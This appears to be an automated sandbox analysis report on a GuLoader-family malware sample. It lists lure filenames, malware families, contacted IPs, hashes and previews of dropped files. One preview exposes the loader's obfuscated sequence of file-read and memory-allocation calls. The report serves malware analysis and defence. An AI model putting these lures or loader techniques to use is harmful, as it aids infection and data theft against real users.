          17194198846f19431fa86ff695fe063dadb4561f59dac5dc011432c27d123f4314e8bbacda424.dat-decoded.exeGet hashmaliciousAveMaria, PrivateLoaderBrowse
          • 109.248.151.231
          8x121Y7FNW.jsGet hashmaliciousAveMaria, PrivateLoaderBrowse
          • 109.248.151.231
          Product Specifications_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
          • 109.248.151.238
          RCBC Plaza Project Quotation.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
          • 109.248.151.238
          ELMA _CO LLC_pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
          • 109.248.151.238
          UNIVERSITY OF SHARJAH- Project FMD20240342.vbsGet hashmaliciousFormBook, GuLoaderBrowse
          • 109.248.151.238
          ELMA CO LLC Main File_pdf.vbsGet hashmaliciousGuLoaderBrowse
          • 109.248.151.238
          ELMA CO LLC _pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
          • 109.248.151.238
          CLOUDFLARENETUShttps://oceanofgames.com/Get hashmaliciousUnknownBrowse
          • 172.67.213.70
          http://johnlewisfr.vipGet hashmaliciousUnknownBrowse
          • 104.26.13.204
          Renameme@1.xlsGet hashmaliciousUnknownBrowse
          • 104.21.18.65
          DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
          • 104.26.13.205
          Potwierdzenie zam#U00f3wienia.doc.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
          • 172.67.74.152
          INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousUnknownBrowse
          • 172.67.148.197
          https://0o2r8g.lotedes.com/iaxgkyg7/Get hashmaliciousHTMLPhisherBrowse
          • 1.1.1.1
          Setup-10.msiGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          NhWAWEhCi7.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
          • 172.67.221.174
          http://johnlewisfr.comGet hashmaliciousUnknownBrowse
          • 104.26.13.204
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          3b5074b1b5d032e5620f69f9f700ff0eMaersk_Shipping_Invoice_Awb_Packinglist_pdf.vbsGet hashmaliciousUnknownBrowse
          • 172.67.74.152
          DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
          • 172.67.74.152
          DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoaderBrowse
          • 172.67.74.152
          Potwierdzenie zam#U00f3wienia.doc.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
          • 172.67.74.152
          Setup-10.msiGet hashmaliciousUnknownBrowse
          • 172.67.74.152
          BQ & Drawings_pdf.r00.vbsGet hashmaliciousUnknownBrowse
          • 172.67.74.152
          https://bpecuniaimmobili.com/J0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MzY/Get hashmaliciousUnknownBrowse
          • 172.67.74.152
          Kh7W85ONS7.exeGet hashmaliciousAsyncRAT, DarkTortilla, StormKitty, WorldWind StealerBrowse
          • 172.67.74.152
          Purchase Order Project No.8873_ECOFIX.exeGet hashmaliciousUnknownBrowse
          • 172.67.74.152
          Purchase Order Project No.8873_ECOFIX.exeGet hashmaliciousUnknownBrowse
          • 172.67.74.152
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
            DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeGet hashmaliciousGuLoaderBrowse
              004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
                P0-ADFUK.bat.exeGet hashmaliciousGuLoaderBrowse
                  P0-ADFUK.bat.exeGet hashmaliciousGuLoaderBrowse
                    pp0fHVNbib.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      pp0fHVNbib.exeGet hashmaliciousGuLoaderBrowse
                        kZlAkx6fp7.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          kZlAkx6fp7.exeGet hashmaliciousGuLoaderBrowse
                            C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\BgImage.dll004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
                              DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeGet hashmaliciousGuLoaderBrowse
                                004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
                                  P0-ADFUK.bat.exeGet hashmaliciousGuLoaderBrowse
                                    P0-ADFUK.bat.exeGet hashmaliciousGuLoaderBrowse
                                      C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\UserInfo.dll004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
                                        DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeGet hashmaliciousGuLoaderBrowse
                                          004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
                                            P0-ADFUK.bat.exeGet hashmaliciousGuLoaderBrowse
                                              P0-ADFUK.bat.exeGet hashmaliciousGuLoaderBrowse
                                                Process:C:\Users\user\Desktop\Order 00293884800595.bat.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):49
                                                Entropy (8bit):4.75216571132969
                                                Encrypted:false
                                                SSDEEP:3:a6QLQIfLBJXlFGfv:xQkIPeH
                                                MD5:797DA95245047A54F125FBF3B19FA295
                                                SHA1:9E46F51C033836343C4099609F35B9B62C290A00
                                                SHA-256:A047914D1DB23829E36D3A2A908D83F4B51F5A8194AE090BB9F9AB9F8DDA9128
                                                SHA-512:4755C72A469C7C816D7B4A08BFEABFC266AAD029156A301E2592E3AFD16C5DB5FCE44C4475CB83C43B859A06AD069370182FCA5CAFACF4A27D191F4C0AE34A03
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:[Loading]..Start=user32::EnumWindows(i r2 ,i 0)..
                                                Process:C:\Users\user\Desktop\Order 00293884800595.bat.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):7680
                                                Entropy (8bit):5.188410641489526
                                                Encrypted:false
                                                SSDEEP:96:8eQMA6z4f7TI20Y1wircawlkX1b3+LDfbAJ8uLzqkLnLiEQjJ3KxkP:tChfHv08wocw3+e8uLmyLpmP
                                                MD5:2D5F40DDC34E9DC8F43B5BF1F61301E3
                                                SHA1:5ED3CD47AFFC4D55750E738581FCE2B40158C825
                                                SHA-256:785944E57E8E4971F46F84A07D82DEE2AB4E14A68543D83BFE7BE7D5CDA83143
                                                SHA-512:605CEBCC480CB71BA8241782D89E030A5C01E1359ACCBDE174CB6BDAF249167347ECB06E3781CB9B1CC4B465CEF95F1663F0D9766ED84EBADE87AA3970765B3E
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Joe Sandbox View:
                                                • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                                                • Filename: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, Detection: malicious, Browse
                                                • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                                                • Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse
                                                • Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse
                                                Reputation:low
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4.W.p.9Cp.9Cp.9Cp.8C@.9C..dCy.9C$..Cq.9C$..Cq.9C..=Cq.9CRichp.9C........PE..L....C.f...........!......................... ...............................P............@..........................$....... ..d............................@....................................................... ...............................text...3........................... ..`.rdata....... ......................@..@.data...$....0......................@....reloc..l....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\Order 00293884800595.bat.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):12288
                                                Entropy (8bit):5.744994954995265
                                                Encrypted:false
                                                SSDEEP:192:gFiQJ77pJp17C8F1A5xjGNxrgFOgb7lrT/nC93:E7pJp48F2exrg5F/C
                                                MD5:12B140583E3273EE1F65016BECEA58C4
                                                SHA1:92DF24D11797FEFD2E1F8D29BE9DFD67C56C1ADA
                                                SHA-256:014F1DFEB842CF7265A3644BC6903C592ABE9049BFC7396829172D3D72C4D042
                                                SHA-512:49FFDFA1941361430B6ACB3555FD3AA05E4120F28CBDF7CEAA2AF5937D0B8CCCD84471CF63F06F97CF203B4AA20F226BDAD082E9421B8E6B62AB6E1E9FC1E68A
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 1%, Browse
                                                Joe Sandbox View:
                                                • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                                                • Filename: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, Detection: malicious, Browse
                                                • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                                                • Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse
                                                • Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse
                                                • Filename: pp0fHVNbib.exe, Detection: malicious, Browse
                                                • Filename: pp0fHVNbib.exe, Detection: malicious, Browse
                                                • Filename: kZlAkx6fp7.exe, Detection: malicious, Browse
                                                • Filename: kZlAkx6fp7.exe, Detection: malicious, Browse
                                                Reputation:moderate, very likely benign file
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L....C.f...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...h....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\Order 00293884800595.bat.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):4096
                                                Entropy (8bit):3.327532764383977
                                                Encrypted:false
                                                SSDEEP:48:qKNKyd+Z46pHT1wHsl9rEGbgPgVZShMmj3OPRYBA:5JSRzuHsxE4VH6O+i
                                                MD5:90228DD140188EC0CA02F7F52E4C9A30
                                                SHA1:6880D9AEEC4C97C4B7718044C9C59B92379FEACA
                                                SHA-256:54BCF3D018734B884BD33A74A05EEA0AC3C83501ACBDB71EA8EC56EC9402A263
                                                SHA-512:1A38B1EBB9E2440DD240C8CD2406261E21B544ED392F808D36F78590075F854D89E624589BFDDABCACE96B33A7F3084C7686351BD66AE07EC035BBEF94EF8DA2
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Joe Sandbox View:
                                                • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                                                • Filename: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, Detection: malicious, Browse
                                                • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                                                • Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse
                                                • Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse
                                                Reputation:low
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L....C.f...........!................|........ ...............................P............@.........................@"......l ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...X....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\Order 00293884800595.bat.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):6656
                                                Entropy (8bit):5.178709395875687
                                                Encrypted:false
                                                SSDEEP:96:z0OBtYZKtPsrqBApt1JHpb9XWk7Qe06iE6mE6YNFyVOHd0+uPHwEX:4tZKtrAJJJbP7iEHEbN8Ved0Ph
                                                MD5:4A2F4FE4A3AD1DE56EE6BF7DD4923963
                                                SHA1:7CC68B94448C964FD99904E5784B059AED4D5DAA
                                                SHA-256:89B1E6509A1B45B32933E9D785A9C8C5B9CE7C616E1112DCF7FC3FA5CA27EBDE
                                                SHA-512:4B6BBE75BEAFAE9A29932FF5DDD3940AADFAE62C157836E6CDAB755955782DD5354D5EB389B4B8C16BF59F4CE7A099A0161D915C1CF2968F28E195DC8E3997EA
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Reputation:moderate, very likely benign file
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\Order 00293884800595.bat.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):25
                                                Entropy (8bit):4.163856189774724
                                                Encrypted:false
                                                SSDEEP:3:+gMn:8
                                                MD5:ECB33F100E1FCA0EB01B36757EF3CAC8
                                                SHA1:61DC848DD725DB72746E332D040A032C726C9816
                                                SHA-256:8734652A2A9E57B56D6CBD22FA9F305FC4691510606BCD2DFCA248D1BF9E79C7
                                                SHA-512:D56951AC8D3EB88020E79F4581CB9282CA40FAA8ADC4D2F5B8864779E28E5229F5DFE13096CF4B373BBC9BC2AC4BFC58955D9420136FB13537F11C137D633C18
                                                Malicious:false
                                                Preview:[Caps]..Setting=Enabled..
                                                Process:C:\Users\user\Desktop\Order 00293884800595.bat.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):3011
                                                Entropy (8bit):4.875614577841428
                                                Encrypted:false
                                                SSDEEP:48:Sl+lWlUMDNbr6641SO9Agz4x2qEtyTgz0gWP5CZ9sam0uxKKhY7SDEf:W+lLMDNbr6641S0z4xFEITggV+9zXa3Q
                                                MD5:6103DF2AF52F53D95AF61664D1866FFE
                                                SHA1:6AD99D4586667B497725EEC01AE0A772C441C1D4
                                                SHA-256:6AA446B014371D8DD9EF43D2A103E9CA8A0F61A3AFC4676BFC63AD07C1977C7E
                                                SHA-512:2AFA117DD3ACB8B695FFBC0F236E8B87F1DD4A7EAFD79A26CB4F191EED76DEBA7CBB106F3E78218769581C014840D039A4E173340CA0D6C2D2DFF0B5C5138096
                                                Malicious:false
                                                Preview:...W..n......t......b.5..Cb....&.................:....Q........x.i..../........h....x.`......(...D..x`...........'...M..z..v.........J.;...3...B.......#..s.._......p....q.,.t..........J.............................5...W.;B...G......._.............G.".3...mi..9.=..4.......V........7......@..o.1..n...u......9............=........D...........=.........y..).............Q.q................zG....O.0.}C...@......8.9bg.M...<........r......!Y.J.......A..........;.R............3..\...4.....N.2.X.i.......'.s..0....7....<...6.<......~..........).>..]...;....I...........:...R.....Lg....v..8............m.................T.$......ry5.5......A............M.............p..k..........2...~.k......................Y.Y`...}.....f.......8.PE........m...:.......a~......l-8..P..z..%.0.....]..L:.....E....?9.1.......;...E.....|...t.....n................vH.....u.................Q.<.Y....8......r.v............7........,1....Z.....c..6.G.....xc..j...8.H~....#.........F.,.......{-.VQ..6.v..u..f.....$.
                                                Process:C:\Users\user\Desktop\Order 00293884800595.bat.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):3794
                                                Entropy (8bit):4.876163305802233
                                                Encrypted:false
                                                SSDEEP:96:LnmpgKl8MI0hs4Qnu6lgB+EQFO+trNMgUIkR:7UpaMI34iu6eBdwO+8rIkR
                                                MD5:0629DF955F60990975A3C8EF199B57E9
                                                SHA1:FE57FA7FDF44B6E789A760C5292FD8DAE221187B
                                                SHA-256:499908BD96C7F2D9BC0F94433CC14C482C002C07A09DF0D73AF45BC17C4DA70B
                                                SHA-512:753EB2360926F32A6ED70E034FEAA57D6274756C3CE60914A4A1EC12DC07ACAC92C7906E3FE48A76F74BBEFBE8EAC023D352D11A087F47DEE9BD0ACBB59331F8
                                                Malicious:false
                                                Preview:.s............W?...T.7.h....~..2....4....`...Z....n..,.....L#.<....`j......U.................l...n.....................j......_...!/...........A........-.......Tk.................W......wv.4.N.....................>....n.T....OP.....%..e..."....,...]U...R. ..4.1k..........3J.%......d.....W............~..z...`........p......~D.....o..[...ib.......C......A..........%.....{.......W.r...............f...h....<...........~.......9.#.......0B>..o..*............,....p........T....J...]Y.S .........#.............................z......3..........{....H....p......v......V..F......,U..=.......R......Q.._.-4........,1...0.............v...z.............2<g.......;....!........g..d.1......d.J-......E.q......,.+...>.4eh...|T.:....B.......C........U......?.>..7.....h.....:...."..!..........6..........................B.@D.W.....8..............t..H.h............................S...h.....x....5......c."...................Q>.....2.5...)....%......T.....v........;1.......x.'.D.....y=.......O........
                                                Process:C:\Users\user\Desktop\Order 00293884800595.bat.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):10873
                                                Entropy (8bit):4.45315643418991
                                                Encrypted:false
                                                SSDEEP:192:NnMiU6OB3y5rHQbiFwEfer0QRluQmbOysQvb7QdhA4rkcm+W86T:NMiU6U3y5jE6w0erLR0FOWbUDAUg
                                                MD5:4E2651680D03081750960F589C34FAFA
                                                SHA1:F2C11C99549A2F32D2F794271CFF605470A0DDA3
                                                SHA-256:47C3443F81BD967BBC234AC79B0B240EBDFCEF0684890AF05E30CD4B41818087
                                                SHA-512:6F0DACB3704F2AC5357BF228AF41D55D270C75CDF0359C50BBE10E61E80EE24AD2D4EB2E25B00DCBC75CD1F769E33F81236B9BBF338C495F787A225C115C991E
                                                Malicious:false
                                                Preview:...A...........8.LLL.4.mmm...II.............KK.......LL.........**...`.\\\...................._k...e...r..^n.gge...l...3...2...:...:...C...r...e...a..ot...e...F...i...l..ce...A...(...m.yy ...r...4.P. ...,... ...i... ...0...x..=8...0...0...0...0...0...0...0...,... ._.i... ...0...,... ...p... ..G0...,..I ..8i... ...4...,... ...i... ...0...x...8...0...,... ...i... ...0...)...i.......r...8..2q...k...e...r...n...e...l...3...2...:...:...S.:.e...t...F..Hi...l...e..fP...o.**i...n...t...e...r...(..Si.rr ...r...8...,..{ ...i..& ...2...3...0...1...2... ...,... ...i... ...0...,...i... ...0...)...i.......r...4...q...k...e...r...n...e...l...3...2.3.:...:...V...i...r.HHt...u...a.Z.l...A...l...l...o..ac...(...i... ...0...,...i... ...3...1...6..)7...4..~3...6.!!8...,..G ...i..\ ...0..dx...3.Y.0...0...0..v,... ...i.;; ...0...x..'4...0...)...p.......r...2...q...k...e...r...n.{.e...l...3...2...:...:...R...e...a...d...F...i...l...e...(...i... ...r. 8..1,... ..Zi.x. .6.r..Q2...,... ...i. . .ff3...1...6.j.7
                                                Process:C:\Users\user\Desktop\Order 00293884800595.bat.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):253454
                                                Entropy (8bit):7.522001887072237
                                                Encrypted:false
                                                SSDEEP:6144:4p6mcA5t6dww234eadgurEHsERrPNEVzoo3mKd/nmt+:06mR5Edt22uv1emKB9
                                                MD5:30D029AAEF1DD0E2E041462E6AE62742
                                                SHA1:E8065BC7AEE55C97FA97A08070F40F2BF5169464
                                                SHA-256:43F89369DB3D8E15A092E771580E111E4CD3C517F83F48CAC9907FBF9872B2A0
                                                SHA-512:724DD6EA2CBB319ADFA7A2AC4E87739AF15A3C4D1904743032AC0CF2D1E4AE6240B81FD65E041AF34F8233393A7BAA1D8EE907FB311F741F7BB9A6B86AC1F824
                                                Malicious:false
                                                Preview:...............WWW.???..............------...................H......................ccc..b....vvvvv.X.........................................................ZZZ.@@......6..PPP.)))...888........GGGGG........................EEEE....L...............c..........o.............N...........MM.................................$$..r...................@.......^.#..........C......ccccc.........ddd......................A......................................!....G......????...................LL..........^.......................QQQQQQQQ....z..............1....."""................bbb...^.A....................q.....................................s.........<<.N.....................KKK...................................ggg....]._....777.c................]......x............;......2222..a.x....;;.I....|...nnn....::.f..666.................X.........QQQ........v...........3..........{..........................*....N..........}.................###..................;;;;.............X.....QQ.......i....HHH.j
                                                Process:C:\Users\user\Desktop\Order 00293884800595.bat.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):2438
                                                Entropy (8bit):4.834166284053989
                                                Encrypted:false
                                                SSDEEP:48:QMQ2WErZ2pGC24S3HorZ9JAGA8jkcrbs1DHkkkIq/iSlcHKMVi:X59ys3HorNAGArcr2c/WKWi
                                                MD5:6C88CA43B6FA2E51F1BE781CDF1A7C3E
                                                SHA1:85E53052FFFD4D9AB7FD255A39628FB9D9A4C57D
                                                SHA-256:87747776DBB97E3892F3B4FE2507A907737E3E01F94F88B0D0ED7D849EFD31CF
                                                SHA-512:4B12F969637C61A8F6E1EF79DB3D54DC076672E35B1F67B9742F3B99A38F933298E2DB262A5DB487E281B85BF37FF74FB036E5C5AA3D6844B2D8AC0937B0F483
                                                Malicious:false
                                                Preview:...-....?..A..d.Z..............!.........\..j+.\...E.C..0.6........3.......K....E.....x....g..l.A............Ic........)P.7e.?.......v...|...Q.....h..<.....>........v6.=..;....@...............8,.........W....4.w... ..y......n._...L.IFr.....N...w...U..........H...%.......)......n..<K...:.........o...x..<........0....I...!&.......<.....p..._...........s.......L.......O...F...........p.......c..c.........%.]........X.........-......X.....{.x........^."...x...N....,..........1......)WD.+.[........?P..........4....6...........Z.B............R....;.....e.(.....7...}.........P....3...7B.....(...................................$........O.-"...k....]..........]....F.)...........)......v.....^..Q.......f}......!....0.........=........................m...........A....Q...(w...a......J3...U.n....\0...M..)......Y.....P..#...........p..R........N..^...R.............'.{.............y....g.....^L.......X.............t=z...VP..|.........l..E.-..(..F.....q..I....p..N\.......S.....f1.......4.
                                                Process:C:\Users\user\Desktop\Order 00293884800595.bat.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):3194
                                                Entropy (8bit):4.87998401204962
                                                Encrypted:false
                                                SSDEEP:48:rpEyDeY5QtYx201GaEtVnQvy5Dv6Z3JIV50tFh1FrDopL0AHmEMAaovQIS+GO/m+:fDeATGaETkd5J8e51xMYOey/mgRbP
                                                MD5:73DC0D944FBB5219CEDD966AF6EBB2C8
                                                SHA1:24D17D23C94CFC76FEF577CAF82C6D45B6125591
                                                SHA-256:3C2F20CCCBB8EEC2F5B2A70E44EC1631BFC8070C2F5A9198F1096563A8D0FA52
                                                SHA-512:72FE2BEEAFE7F5296FA346947E0BE3824B934545A299BFCB4AEBA9BD095AA7A2756E42C9D88E5DDDD072C931D35075AED7C7D4E3B641F74A62C96E150C573E4F
                                                Malicious:false
                                                Preview:........F...........].....<.~......d.............Y..1t...o...(...XA...~.h.qE-...KY..........F{....X............E)....x...R}......$$.}..6.......h+...9&.....c.....+.f..d........!.C....E.z../.....MZ............g.......\..?....@.....s..k.P}......$.<...........aE....!q.........*..e.V.q.b..Ui.R..>.h..R.F...........jM.W..G...^.l.....%.........D......*.v.P.=....s<.....D".....0.).$...B......+..*.B......N..o....o../....z..................G..............%..L..Y.....r.B.Zn..I...x...f.............)....6........?..............."..............'....-......G.................x..C...............t....`.................Q.a....}....e...................i.............0.q.....G..#......t....../]..hH.(......C.Y.z4...y........T..E...E....3....i....._........>.?.p...e....y..)?...o..i....5...S.$.....,.............\.......)..u.........8............p..\......... .........3...9....t...._..o......#U...r0..................g..............n.....d.....b....qE...............4..%..j..0Y.P......(.z...........R<C....
                                                Process:C:\Users\user\Desktop\Order 00293884800595.bat.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):434
                                                Entropy (8bit):4.287029634434794
                                                Encrypted:false
                                                SSDEEP:12:THnAEO/X/lz5Qxq70QPiETlsieWr5hmhAZYOua3Jy6:kt5CqtPT7rUk3f
                                                MD5:D831A4A6C7B8B672C51DC73C42BF1B99
                                                SHA1:2EFA4039C5CBBE38D45B65CFCD8CB283B0B00F6F
                                                SHA-256:57B3854CDF7B15EB58BFD24E92F41E8B4A513F9A413E7981891B71F5BD56F4B8
                                                SHA-512:D5920BC02B61C18C83CE48D41AE1777F50685766A60CCB6C53161B25E3AFB34A1DDB0E8710C37E3B8B050F772E3EAB3A65FB4ACB093AEFD55AA2FDA74EC6C8F7
                                                Malicious:false
                                                Preview:chertier urduet extrabronchial foruroliger weakliest digesters glansbillederne weretiger superinfiniteness halisteretic udkommentere snowbourn gldstninger..resknderens landhandler ujvnheds rankerne rykkedes,kosos skabelseshistoriens sklves newsmagazine,timberman civilists expection unlowered agrostology landsplanlgnings stereoisomerism.parablen pachydermatoid jumpsuits kraftens estraden.misocapnic blygraa perirraniai flaskebakker,
                                                Process:C:\Users\user\Desktop\Order 00293884800595.bat.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):2322
                                                Entropy (8bit):4.685927571910316
                                                Encrypted:false
                                                SSDEEP:48:hKk/USLt/YV/KNG2/Jddel368ugS8jMMccq3mtjzlrNiNviupW9:hb/USL1YV/K/TdeQ8jMMcYn3Opq
                                                MD5:C4A322BD2B1B0FD5130E2119EBE14A09
                                                SHA1:4C0F0F8AAC954E9D599F8C89B340F5C3C4742A6B
                                                SHA-256:063D6E2970210F7A4C74FE744AD76E71650AB5CB974EE4A9AF2BF446D6B2B3BF
                                                SHA-512:64FCE5DC8E510DCCAEA30E2BDB0671C706CECFB4AEC19ECD5B6326E4EE4B1B33A422E917A522F0CFCA184007ABE2B9D89EA401757A637D8D3DFA4B156E58A04A
                                                Malicious:false
                                                Preview:..e..k......Dh........=........z...W...m5K...0...R....4:.L....p.........-.......>...`..#.^.......>...d.d..7..........E...5N...@.......................K......:.o........t....... ......;....e.....R............>......,..&.|...................l+..e....q..Cf....U|..I.X.....U..e.G.....f.........&.......A....................9..}....E...............~.....9...q......T...G.....( ..t..x.......y......[.........Hh....GC9...........Q......C..N..Qt.~.......x.....L.......1.............................T..........V....6.....Ajt..@.....?...............$X.......m.n..........,.U......7.......X.................V........W......\P..............PE.....w......F....:.'9H....;eB.....{+.{.J....s........F....:......X..k.........../.......?.Z..+.....>.F..`1T....2.3.I7...`..{....k.u......b.......J+D...........Y8..y......UU...............3./...... .....[........]N6...y.e.........H..............m...........\.........V..[........W...&.U..........2..r....C....U.3....?...~....Wz......W.....|.C.......a,............
                                                Process:C:\Users\user\Desktop\Order 00293884800595.bat.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):3861
                                                Entropy (8bit):4.8950653795254695
                                                Encrypted:false
                                                SSDEEP:96:GKEfl8Ry/OyCvfcyh5ph9whBJQRaTYbEVr1wbd:MfObXc2h9iQUDZ1y
                                                MD5:2B5A33F2637CE6016495BE603413514E
                                                SHA1:571279989D47FF42C2974CDEDEA4C872CB9424CF
                                                SHA-256:46F41A0D8B9B891702F9ED2FB60FF737A2275011882501155B710EF9BA8577C7
                                                SHA-512:F55FE759C0DF2E8B9E38962E386BEB468FD4442714233F5A5DD13CA10647411FD62D966D8363FE50568F15525EEE815493AEDEF112A6FA6FA0B506A97AF21CF6
                                                Malicious:false
                                                Preview:.N..........b..Q...G..p.1...;...f._......X.........+..................1r.ES...9...~..C...?B...........IpF........0.......3...............S.......w..>?...$.....J...q..............K..................l........................;.......!.....................I.:..................S......4..kZ.../..................d.......a..............cs....9.......l......(....h.....F..'.V..........}..&C.;U..........._...............N..#.V...................:..".............j...?.....K...H.....s................._....L...1.....Z..L........."..........J.......1......`.......1..........@.y.......6...P...]....Z..........................Ob.....L.....U..cZ..n.CXq.........0...q.......K..........U...K....@/..|.......... ..|......pN.E......................>......?..Z=k....<............S......p.<..3..........1o.......Il.....3.y.................2....(.!.i(XC...b...Le..`.........@............*........=.....=v.=.'..>.............?........].Y..m........."$^L..^A...u......O....K9.3.......................;uG..*.
                                                Process:C:\Users\user\Desktop\Order 00293884800595.bat.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):3435
                                                Entropy (8bit):4.910328234136937
                                                Encrypted:false
                                                SSDEEP:48:P/sA7KBdAWdry+HEnrwU7j9mS/QwZ/kQMlzuVm+aAIBzx396upw/QAa/rl0:sA70/BEwy9D/XDVtIBzx3oupIa/6
                                                MD5:4A27BE5B33E9690FFCC4087DE6B78DE1
                                                SHA1:808A634035F94A20441F52F413777897DFD7D3E0
                                                SHA-256:CA6742E9E11A6E3008BAE84674451A7228E0E79F53A34235269984EFAE996C72
                                                SHA-512:6D4114A7DCF410C531465AEE6802A3A0A965864DD4AE65E304188931D17C394B3A700DA6558CCB2BF37AA99906D34A1E38E7CF62E655A6E2EAC3E5CDC38449E9
                                                Malicious:false
                                                Preview:.*.....G.[..........*Wd......^..................;{..+........o..a.....g..2......BN...........m`..{...g..k..(..........Z.s...Z....|.`.$....u..m..@.b.h.........n[.q...!.....(B.C..........4KC..................v.......[.q.i.......ug...g...E.....A..[..o38..........N.^.......y.p.z....._.!..........<.,..I.Y..G................._....;\.&........\.....bu..>...........=...r..y...}....`|7.......w...2...........*od.C.......................... ....................ul._9.4<...~..........................e]...+.....i.......... _....................l...........z.u..2f...4...$.Pg................J............h...D.......R.3..........G!..w.r."..........{.JS8........O.P....m...'.......rS..........1..2....0.......+....M...0.....Y...:.*........Q....g.l.q......'.r$..........7............6.........o..2..5...........%.0...:.........G......................|............._...8.P...................|.......r...........M.......6~...B...g.d.........5....'...................3....Y...}.4L.DT,.....R..Ds....7.........
                                                Process:C:\Users\user\Desktop\Order 00293884800595.bat.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1618
                                                Entropy (8bit):4.660461986408
                                                Encrypted:false
                                                SSDEEP:48:mV2wmwMfFEXBaoCpI1sCEVHQTtlgJtScnbhH7D:maNK/0IOQjgJhx
                                                MD5:5A5EB5C7789F88A3DCC3F79DB0AA1A49
